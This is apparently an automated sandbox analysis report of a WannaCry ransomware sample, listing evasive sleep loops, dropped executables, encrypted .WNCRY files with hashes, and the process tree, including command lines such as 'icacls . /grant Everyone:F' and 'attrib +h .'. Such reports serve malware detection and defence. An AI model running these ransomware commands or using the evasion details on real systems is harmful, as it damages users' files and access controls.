Source: C:\taskdl.exeCode function: 6_2_00401080 GetDriveTypeW,Sleep,swprintf,swprintf,FindFirstFileW,swprintf,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z,?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,DeleteFileW,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,DeleteFileW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,6_2_00401080
Source: C:\taskdl.exeCode function: 11_1_00401080 GetDriveTypeW,Sleep,swprintf,swprintf,FindFirstFileW,swprintf,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z,?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,DeleteFileW,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,DeleteFileW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,11_1_00401080
Contains long sleeps (>= 3 min)Show sources
Source: C:\1.exeThread delayed: delay time: -1000
Enumerates the file systemShow sources
Source: C:\1.exeFile opened: C:\Documents and Settings\All Users\Adobe\~SD123A.tmp
Source: C:\1.exeFile opened: C:\Documents and Settings\All Users\~SD1239.tmp
Source: C:\1.exeFile opened: C:\Documents and Settings\All Users\Adobe\Acrobat\11.0\Replicate\Security\~SD123E.tmp
Source: C:\1.exeFile opened: C:\Documents and Settings\All Users\Adobe\Acrobat\11.0\Replicate\~SD123D.tmp
Source: C:\1.exeFile opened: C:\Documents and Settings\All Users\Adobe\Acrobat\11.0\~SD123C.tmp
Source: C:\1.exeFile opened: C:\Documents and Settings\All Users\Adobe\Acrobat\~SD123B.tmp
Found dropped PE file which has not been started or loadedShow sources
Source: C:\1.exeDropped PE file which has not been started: C:\taskse.exe
Source: C:\1.exeDropped PE file which has not been started: C:\@WanaDecryptor@.exe
Source: C:\1.exeDropped PE file which has not been started: C:\u.wnry
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\1.exe TID: 3484Thread sleep time: -500s >= -60s
Source: C:\1.exe TID: 3684Thread sleep count: 189 > 30
Source: C:\1.exe TID: 3684Thread sleep time: -189000s >= -60s
Source: C:\1.exe TID: 3696Thread sleep count: 33 > 30
Source: C:\1.exe TID: 3696Thread sleep time: -99000s >= -60s
Source: C:\1.exe TID: 3692Thread sleep time: -100000s >= -60s
Source: C:\1.exe TID: 3712Thread sleep time: -180000s >= -60s
Source: C:\1.exe TID: 3712Thread sleep time: -30000s >= -60s
Source: C:\1.exe TID: 3700Thread sleep time: -30000s >= -60s
Source: C:\1.exe TID: 3716Thread sleep time: -1000s >= -60s
Source: C:\1.exe TID: 3696Thread sleep time: -3000s >= -60s
Source: C:\1.exe TID: 3684Thread sleep time: -1000s >= -60s
Source: C:\1.exe TID: 3692Thread sleep time: -5000s >= -60s

Hooking and other Techniques for Hiding and Protection:

barindex
Disables application error messsages (SetErrorMode)Show sources
Source: C:\1.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOX
Uses cacls to modify the permissions of filesShow sources
Source: unknownProcess created: C:\Windows\System32\icacls.exe icacls . /grant Everyone:F /T /C /Q

Language, Device and Operating System Detection:

barindex
Queries the cryptographic machine GUIDShow sources
Source: C:\1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Windows\System32\cscript.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cscript.exeQueries volume information: C:\@WanaDecryptor@.exe VolumeInformation

Behavior Graph

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
behavior_graph main Behavior Graph ID: 268923 Sample:  1.exe Startdate:  12/05/2017 Architecture:  WINDOWS Score:  68 0 1.exe 1 1004 main->0      started     5230sig Drops files with a non-matching file extension (content does not match file extension) 8650sig Ransomware detected (based on file extension or ransom instructions from fsrm.experiant.ca) 8097sig Command shell drops VBS files 8627sig Potential malicious VBS script found (suspicious strings) d1e75041reduced Dropped files exeeded maximum capacity for this level. 2 dropped files have been hidden. d1e75041 taskdl.exe, PE32 d1e75068 taskse.exe, PE32 d1e75095 u.wnry, PE32 0->5230sig 0->8650sig 0->d1e75041reduced dropped 0->d1e75041 dropped 0->d1e75068 dropped 0->d1e75095 dropped 2reduced Processes exeeded maximum capacity for this level. 4 processes have been hidden. 0->2reduced      started     7 cmd.exe 0->7      started     2 attrib.exe 0->2      started     3 icacls.exe 0->3      started     7->8097sig 7->8627sig 9 cscript.exe 7->9      started     process0 fileCreated0 signatures0 process2 signatures2 process9 fileCreated2 fileCreated9

Yara Overview

No Yara matches

Startup

  • system is w7_1
  • 1.exe (PID: 3480 cmdline: 'C:\1.exe' MD5: 84C82835A5D21BBCF75A61706D8AB549)
    • attrib.exe (PID: 3612 cmdline: attrib +h . MD5: 459A5755AFBB1CB3E67CA4C1296599E3)
    • icacls.exe (PID: 3644 cmdline: icacls . /grant Everyone:F /T /C /Q MD5: 1542A92D5C6F7E1E80613F3466C9CE7F)
    • taskdl.exe (PID: 3704 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • cmd.exe (PID: 3720 cmdline: C:\Windows\system32\cmd.exe /c 67541494599812.bat MD5: AD7B9C14083B52BC532FBA5948342B98)
      • cscript.exe (PID: 3756 cmdline: cscript.exe //nologo m.vbs MD5: A3A35EE79C64A640152B3113E6E254E2)
    • taskdl.exe (PID: 3928 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 4028 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 4072 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
  • cleanup

Created / dropped Files

File PathType and HashesMalicious
C:\00000000.eky
  • Type: data
  • MD5: E491B0F5EE29612A3397521598E3D51C
  • SHA: 692C4C2917FD7C2965083269061D09A791487DAF
  • SHA-256: 87806D6C001F7D60769D64509BB25FE8E9AAF844D3EA4BEF5F04F98336F59E04
  • SHA-512: 6CD487A12A894EF2C9F8AA4EBAD4C4B4D97A03925FD280D50EE5EBF0ADEE1CEC22A912C9467A59BBB4FC65A2D7B11322AE955313F3F5993CAF170318CB45DFFE
false
C:\00000000.pky
  • Type: b.out pure object file V2.3 V3.0 Large Text
  • MD5: 0DC8C2E4C967616740C774F697A7D96F
  • SHA: 683F7F99A7B5D1D94D30139E4FFBAEB3AEE998CB
  • SHA-256: F56D4FE77E1612953C0C40770B8FC5B8AC1159A72C971A6F8FBD6998DB809E14
  • SHA-512: 646FC4D4E63EECDBC7E78A1A229B150F1CEE409A06A35925DE5D75D8D7533AECB06890F51D0D6FD47F9AE98FC7E917B5A6057346E9737810239A402063552959
false
C:\00000000.res
  • Type: FoxPro FPT, blocks size 54356, next free block index 33773925
  • MD5: 16885C49B33013B8D365C9EAB1F413D1
  • SHA: 265538B19D75FB0346B0F3169EE7239011670A38
  • SHA-256: C05A3972F155B4528C9D05D9E3C99A278A7AB18D9D987A675262BAC59E3A30B7
  • SHA-512: B241AEC56EF2E514D027409F3D13CDFCFFCEA52057B82F5C3EF0ED5AEF0F6EB9551AD3777A1CED60280BF8D91BD4FF7E7825053DD91865EC71CE92553A7BAA82
false
C:\67541494599812.bat
  • Type: DOS batch file, ASCII text, with CRLF, CR line terminators
  • MD5: FEFE6B30D0819F1A1775E14730A10E0E
  • SHA: 6D461FF1EDDB21957383F8840E55C9674B81EFC2
  • SHA-256: F01B7F52E3CB64F01DDC248EB6AE871775EF7CB4297EBA5D230D0345AF9A5077
  • SHA-512: 00130E489D0D8C1BE39AFC6EEA9847D26747045C5FDFBC2AE3103FC73DC0CFF17AD448CCF7A1033FDF6CD77CC67BE017DD477A83E2C85E7569C858B0102FECB1
false
C:\@Please_Read_Me@.txt
  • Type: data
  • MD5: 7E6B6DA7C61FCB66F3F30166871DEF5B
  • SHA: 00F699CF9BBC0308F6E101283ECA15A7C566D4F9
  • SHA-256: 4A25D98C121BB3BD5B54E0B6A5348F7B09966BFFEEC30776E5A731813F05D49E
  • SHA-512: E5A56137F325904E0C7DE1D0DF38745F733652214F0CDB6EF173FA0743A334F95BED274DF79469E270C9208E6BDC2E6251EF0CDD81AF20FA1897929663E2C7D3
false
C:\@WanaDecryptor@.exe
  • Type: PE32 executable (GUI) Intel 80386, for MS Windows
  • MD5: 7BF2B57F2A205768755C07F238FB32CC
  • SHA: 45356A9DD616ED7161A3B9192E2F318D0AB5AD10
  • SHA-256: B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
  • SHA-512: 91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
false
C:\@WanaDecryptor@.exe.lnk
  • Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri May 12 14:36:52 2017, mtime=Fri May 12 14:36:52 2017, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
  • MD5: C8427159B320E428E86A3896AA57E688
  • SHA: 741158513C303323983491EC912941AA00FE11A7
  • SHA-256: 1E460A542E942414C07D33416BC13BC48C422668A78725B275A9389FE620BE2E
  • SHA-512: 023B9D712CB194A5994FFF086998F9218498A76817A32D85ADC7154ED3340855171448BADB9D7FCA922649C9658F7EBF25CD6B048B901F314337301D05DC31DA
false
C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows NT\MSScan\WelcomeScan.jpg.WNCRY (copy)
  • Type:
  • MD5: C227DFAF3D6500A4CFF9ABB229C31ACB
  • SHA: AD4094C319AB89E947F6E39683AE4A8C19AC67EA
  • SHA-256: 171A2533FEF0F65A6F4D8EF51B3BD06037C4A54ADA29A302FD1F0F7F78F27169
  • SHA-512: F173468B53D3AACBE3F7973617BA1EAC670A14ABC74AF1320738A48DB4937D6859233063F016C7F7A5E2673CC6769B4331073D1CCB974269C2B21A47DF1370B3
false
C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\dd_SetupUtility.txt.WNCRY (copy)
  • Type:
  • MD5: 063EB8CFF325A2AFA1D4B2F72515E85C
  • SHA: 61FDF37CF9290081EB492C88064D5F308F2D6B29
  • SHA-256: 5C35BBD8B0FE76E06DFF2BAB96662A97D9E5FF19D10FF6BB4637558D833EE9AF
  • SHA-512: F7419563C419641084A8947ED94FCD8F5A2CAACF681BDEA604DACCE8093B4A7EEA7060BD890EC3423CFDCB6DA202CFBC4356FE60BE4D412A92264D2ACB4F8132
false
C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\brndlog.txt.WNCRY (copy)
  • Type:
  • MD5: EA1B27FDAB584DCC61395C7EB1CF6459
  • SHA: EFF083E97D84C8675DB15198B741AFDB852EAB22
  • SHA-256: 1E603BB7402EADFC4B75686ACA3653CC9F2C1A58BA7BD2037604A7F8D34AD108
  • SHA-512: 7834EAC77EA7B14926FE98CDAC5FFF723359F5ED84856C0215263D9E45A12C004F0FBB85CF37B0D19D8891FA5906439C8D55324515E6A304683F1A667BA9F2B5
false
C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Bears.jpg.WNCRY (copy)
  • Type:
  • MD5: AB9FFA732821A604AD3C199DC851621A
  • SHA: B6EF2BB098F42E0E5B52B5CDD433A000D5ABF71B
  • SHA-256: 2CEBEBE9AF86EE830065E05C8DFC2DB87747E6FC193A7433E8F78AECBAF18FF8
  • SHA-512: 89B120B1F90F2320B012704B3EEEF24EDBB1EFB85C3C5856D6E8B8B358054E1A25E6525B39473B4B09B056CFFC903FB5AECCA65F631DB6C2672493C44A2F8261
false
C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Garden.jpg.WNCRY (copy)
  • Type:
  • MD5: 23DD56312C447B103A7C8B606D299029
  • SHA: 122F540EF13B6766DC973BE313AAB977FE30FF29
  • SHA-256: 54E2ABCBC6DD2F7585ED7A857AC8497F649B99D7535908991CD93D97E82F85CF
  • SHA-512: E9A77A34DE7EE3B07F3FBC1CED9BDA3A2E53E422C073F56E16350E9A7191ADE4CBF6317E7A2F4F4801C03EB8964D978F910FF04E3D3ED31C9E7812BDFA48F7FC
false
C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\HandPrints.jpg.WNCRY (copy)
  • Type:
  • MD5: 1141786DBC4EF52046DD3B13FE1CD937
  • SHA: 3FE9DDBE0E1F767BA408E0D6CF3776BE5294DC87
  • SHA-256: 770C6234329C3B7C8959AC3F0FE971B166050CCCA098278937FDD1E456533460
  • SHA-512: 255FB3A28CCF1C848414992B849765073C06F7B7970A540F4A9A42BCA75325139EEAA4EE32A8D1CF3419F136524ED9BE21748E146BC188932D125B1D328545D6
false
C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Monet.jpg.WNCRY (copy)
  • Type:
  • MD5: F81086C8BF5B322093904CB0CA63B53E
  • SHA: 5F294E07D16509A5965B942208F6B19486A17BC6
  • SHA-256: 2E3131FCCF91189E3ECDC6C15E2FB768151865B230B3A46403120407442DB949
  • SHA-512: 35B3CC48B0353F315FFFCC710DC1006F7DEB2EA2039C19AB32C1A0E296316AEB904D2203E6F585329455AA9DCE372EAEB0105DB1F0C922DDCD6A9E48307DA35C
false
C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Notebook.jpg.WNCRY (copy)
  • Type:
  • MD5: 897BF473805C4E21D7F34A6174C84B9A
  • SHA: 0FF76310FF2DE37B500B1F83BE8B4732654F149D
  • SHA-256: 6DC6E5C58527F4FD2F9DC71E39D8354389B31E26480891B01A582EC401625E39
  • SHA-512: EB67DEB2AAC033660F7AA845FDBB86051FFBC87DD3A9F301E8E2BFA6329983A23729656985C2021000D606FF458CA236959F633F495923F8C8CF264E84F28191
false
C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Peacock.jpg.WNCRY (copy)
  • Type:
  • MD5: 9E0CC337216F80D5BBD5548F2A0999B8
  • SHA: 99E3373888AA6A77D7107CA986AEFAF7F708EA09
  • SHA-256: 4F7537E58F7C6497A16797A8E4968D88FFC806821495F950D9B26A26FF8DE545
  • SHA-512: 8396F6FC1F677D20FBFD63E6C9117C546F7E94E51960EF7DFFCD011ED7DCF6354C0C83830A1409A0C2B73049DDF4F4C14640AFF4A15D27009A17A2291615A476
false
C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Roses.jpg.WNCRY (copy)
  • Type:
  • MD5: 007F6DA2DDBE142577BE5FC24E3EB367
  • SHA: F8ECAEF19F6F1B02BF21453D84CCE5EB5D9429B8
  • SHA-256: 2C201D726B0387D8355AA36085101BDEFFD3DBEDF2A801F70DF70CCF91C8A339
  • SHA-512: 3B0913674C692798C55F2A2B7FBBE8F535A865CC170DF058918A64F95173EEEEDB94BA2C96392C26902E752ED53BFC67B6C26584AB8486436B8CFC81EACA5265
false
C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Sand_Paper.jpg.WNCRY (copy)
  • Type:
  • MD5: F09140B0EB2DF55344B3AC6FDAAFF8F2
  • SHA: 7FF7BDA4E03442008BC17BA4D6D1952D95E2B8D9
  • SHA-256: 5F4179AB2636710E066D9DA5959F082676B57C6C66614E91C3DB2E5EDEBB8980
  • SHA-512: 25B1F6F57BC901761F4CA65E2846F6DF0C1295A4D57993C127BF6EA6BA672F1713E7C3B3E69DE3751BFC6D613E36B64A5CF70E386E58F632F953D0924770F7C5
false
C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Small_News.jpg.WNCRY (copy)
  • Type:
  • MD5: 018BFA41FCB5D75B93360906F60D7DA2
  • SHA: A5981834E975F50BE55A2CAAD36C87C7D58AEE40
  • SHA-256: 0F95AB1BB36A95068370ADB6597E2F62CA626BD0F7448E267C8C608A156CD116
  • SHA-512: 34F43EF3BBD9CD4E478323FCC359F1CEBDE0662802B8E05EBA9B0150CE7B0CF68C4BB0973E6B19C0B108B228E98D2AF0C5A1D6A0DC22146626A2AA3722E4C340
false
C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\SoftBlue.jpg.WNCRY (copy)
  • Type:
  • MD5: C6A4A5B244D10E1232D0393AB8AE6B90
  • SHA: 8BE59236C813621CFD0BFD32374719F0EA52D116
  • SHA-256: 44A8BA99F7774204572A97ED0386A8D6178143B2A0A92ED45BF2B1572BFC69F6
  • SHA-512: A913F20110DCE5D28CEDB20D7F65930E0AD3AFC95A14D890E5D0860E1F53992D60F03C57D800749B43E9ABD3D6072300E8919D2F940D61F5E7946448BD5E3C1D
false
C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Stars.jpg.WNCRY (copy)
  • Type:
  • MD5: A3BE9E052A398D5B21E9171CD0819058
  • SHA: A99753B31E0DEDC82666DC956005ED65DDB2155E
  • SHA-256: 6603400456DF98F00683F23B27144CC1FC8F8164CEB912D3A10E0E8C185134F4
  • SHA-512: C2287DED91EE7CB5E02FC6B70AFF0796B4A3C188F599D4B9D7750E8EDEDA135D8A5B9D51CA4C181ADBD917E141526EE731F78804005F28E2B88A834F74539B99
false
C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Tanspecks.jpg.WNCRY (copy)
  • Type:
  • MD5: 8B650778E0E14DED68D3FEA0B2E414D0
  • SHA: A3A890D08269E7CFD36C467BE2DCD79A09B577F7
  • SHA-256: DEB2B2840EAD03FE306F033A3DAAF13D8ADE29903BA9968A717AD96428C54990
  • SHA-512: DF6D68D23D4CCA4CC0D700FAFE528007AFEFA9038E0A944AC6E1CED0563EBB6B0C9BCA4DB2444EF41BEEF093F6DFD0ADF78F971F03038F58C801CCD09754686A
false
C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\dd_wcf_CA_smci_20161220_074953_666.txt.WNCRY (copy)
  • Type:
  • MD5: 24E55AB10A4544F48B15A595F2C23EDB
  • SHA: B56350BC377AF4618AEA5F5D14C133449F7895A4
  • SHA-256: 20E36BCE928FECFEF22FC4A9704CAEDD6720E9DDE488C74F8AA58A42697146EA
  • SHA-512: B3784525F2A96F2F76B19FA4D6627246B3C8AE880E3AA16D2C0B802B9744DB397E79BDFD0C65A00BB2F4E01FC54052F47DF2452A27BFD9500B9E9822100998F7
false
C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Blue_Gradient.jpg.WNCRY (copy)
  • Type:
  • MD5: A2F7826DB410CD2C3B08F8371C381A09
  • SHA: A39F7ED4FC083E38B571037A2D708D41E76C5296
  • SHA-256: 25ED439F0AB978A9F5D813945C09086CFEA65B006DAC44D579FAFCFC961EC356
  • SHA-512: 54CBDF0C161F213EAF067ABAE1724DF0A3F20F4FB3F3C23AA52EC3B8F75C8E6A9A0789C3305F40A364977F28A20CD35D348EE6053ECDE323FD42DB2A3F47B247
false
C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg.WNCRY (copy)
  • Type:
  • MD5: C42EB400B5D8F86E07BE92FB7B180944
  • SHA: 4C3697E6F31F594A2BC8FCA66D59471131D89E8F
  • SHA-256: 8BEF20A34A974D3EADC55D1EC4DDDBB7DEB532ABEA0CAEE8B608789560FBFBE0
  • SHA-512: 61821C5D9C56F7893494E93E48244398D0E632DF48BB6E6A8DFDD1B08EFA86EEC32DDA78A9DB1F31ED1311CE4C3C19BCC16BDED6C0B634CEEC359065EFD713CE
false
C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg.WNCRY (copy)
  • Type:
  • MD5: C6067CD0D145F6669FDD43FFBD3E0D69
  • SHA: EE34E6768E6E84E91E65DEAB8318FA996132D0CD
  • SHA-256: 95F462484661D62C35A9B62CF31EB7576D8930027D177056D37D61201E19E305
  • SHA-512: 4AE350C66E3D7483E73544DA4EBB8FCD195504ABF71DDA20D549EF0FA906C3ED2E5020740E1E562B2F3F5E04EFEB376553768A0BB607E7741241FD9CE6426E0F
false
C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Pine_Lumber.jpg.WNCRY (copy)
  • Type:
  • MD5: 42A8B804FD8FE99DA8665BAA4A678536
  • SHA: 9E5A2DC0552815B6C5722BE13F2544FF49EBF9DA
  • SHA-256: A3FF2C988DDA65768A737BCCB6B3032D944FDCBD24BEEDA4BC9A84B1934965B3
  • SHA-512: 744C1FE33B40B376930E07F4746A72270740D992FC2F6D23E883452A993A31CE246AD6183DB8B29A030EC9F9C367B9028BCF157D9A2F32B45975E4CDB28E3B32
false
C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Pretty_Peacock.jpg.WNCRY (copy)
  • Type:
  • MD5: C040082A8C22552A6296C82C725DE7F3
  • SHA: E83D4C9E30AB41C229B2FAD1486B103D49D4A1D1
  • SHA-256: A8AD8A38AC62BBA2664D90CD7472AE94F4FB4398BEDCAE745310B42FB85C9D86
  • SHA-512: 3DE151BAB2515634EA69D9AFA7E55C8BDCFE7606B9B4D9317A98F376D294A3156AB95FFBFCA423C113D36666ACFD511134B2575F8C90DF9CA804E15481F9A8C9
false
C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Psychedelic.jpg.WNCRY (copy)
  • Type:
  • MD5: 1184C95208D5F6D32033AC47BCDDC658
  • SHA: 2FE38EE2E332A03E42C2E5F1ABFD11CAC430E7EF
  • SHA-256: AFFCCA86D01B61FF80E71ABB1DC2F27B7C7DAF482BD63F28F8C4B72977043818
  • SHA-512: D7A9647E8155577445B52D54064EA133735750247E0341C6CCE6217C41CDA2701353E78BF71E0CB8A7602E1E4F441E242769B4D8384C85A775B4E8528F910C6D
false
C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg.WNCRY (copy)
  • Type:
  • MD5: 67958E1AD99185CF5E5D2ADFCF93A71E
  • SHA: 8D8A859122024648E1369A5A99655E961BB8DFBE
  • SHA-256: ADEE3A77CBF91090C0087E1FE103D55DCE880AF95C899E04CEE89256B7634153
  • SHA-512: B77A89C39F88E2A66432C76560B0DAB895AD985893BA1453D8AB205CC50A369BCC57F40EA75F14D106056A3033D782029B2FA376B01083ED2F737A71279CFCB5
false
C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\White_Chocolate.jpg.WNCRY (copy)
  • Type:
  • MD5: 4C4109C3AD079A71AA497ACA4F2BEC51
  • SHA: CF49B41A9672952C1EDB633BDA966A5EB7764C73
  • SHA-256: BEA54DBF7A5EF045FE85373B6DB837BE938983FF6F2885E78FB3FD14844A77ED
  • SHA-512: 39F3EAFEA1E1D9E38BD0DE3A51A2C1E3DFAB2AD97226B9E7F0B3FA3135E693CEAA420BC0158FDF3A78A4DF70D6F333C4BEACFAE0E1EB1DA6E7A4CB75123BEE43
false
C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\dd_NDP462-KB3151800-x86-x64-AllOS-ENU_decompression_log.txt.WNCRY (copy)
  • Type:
  • MD5: B2E1AA8BC9C94C3E9E34E4CF9AB205AB
  • SHA: 7CAA1CFFFBB1930E64572CE48883342EE72B2E72
  • SHA-256: 1C3ACDBBF4A6EC1543A9D6569DB77FF09AEED60BA8F3D95D82C0CD27BA2F6B5E
  • SHA-512: E8760B2A7F946BA02BBEB2AF2CE3A3A36082B6AA6C87BC603DC7CDEC3CB541CCADA554F3004F466066A0663604E3DB54177E59B196F1EDFDF1BC2C862A4236C9
false
C:\Documents and Settings\luketaylor\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Microsoft .NET Framework 4.6.2 Setup_20161220_084829697-MSI_netfx_Full_x86.msi.txt.WNCRY (copy)
  • Type:
  • MD5: A66F6DBEE39D234A76DF29BBE670DB9D
  • SHA: 7ED80BD87E7B6F5EE0D6C48D2BE38850F7F89378
  • SHA-256: C88F598094B95C5801E5DE20415085369F44EC88EFDA0FB4498096756512A235
  • SHA-512: EDF3F076A60C8775EEE0D53A21373F57BD52C725DFF6F200FAA509EE2414DD1CB6107AB41FCC5E1F03F29232BB2EF707B2767EB9CC1D72E9375F7FED23907087
false
C:\ProgramData\Microsoft\User Account Pictures\@Please_Read_Me@.txt
  • Type: data
  • MD5: 7E6B6DA7C61FCB66F3F30166871DEF5B
  • SHA: 00F699CF9BBC0308F6E101283ECA15A7C566D4F9
  • SHA-256: 4A25D98C121BB3BD5B54E0B6A5348F7B09966BFFEEC30776E5A731813F05D49E
  • SHA-512: E5A56137F325904E0C7DE1D0DF38745F733652214F0CDB6EF173FA0743A334F95BED274DF79469E270C9208E6BDC2E6251EF0CDD81AF20FA1897929663E2C7D3
false
C:\ProgramData\Microsoft\User Account Pictures\@WanaDecryptor@.exe.lnk
  • Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri May 12 14:36:52 2017, mtime=Fri May 12 14:36:52 2017, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
  • MD5: C8427159B320E428E86A3896AA57E688
  • SHA: 741158513C303323983491EC912941AA00FE11A7
  • SHA-256: 1E460A542E942414C07D33416BC13BC48C422668A78725B275A9389FE620BE2E
  • SHA-512: 023B9D712CB194A5994FFF086998F9218498A76817A32D85ADC7154ED3340855171448BADB9D7FCA922649C9658F7EBF25CD6B048B901F314337301D05DC31DA
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\@Please_Read_Me@.txt
  • Type: data
  • MD5: 7E6B6DA7C61FCB66F3F30166871DEF5B
  • SHA: 00F699CF9BBC0308F6E101283ECA15A7C566D4F9
  • SHA-256: 4A25D98C121BB3BD5B54E0B6A5348F7B09966BFFEEC30776E5A731813F05D49E
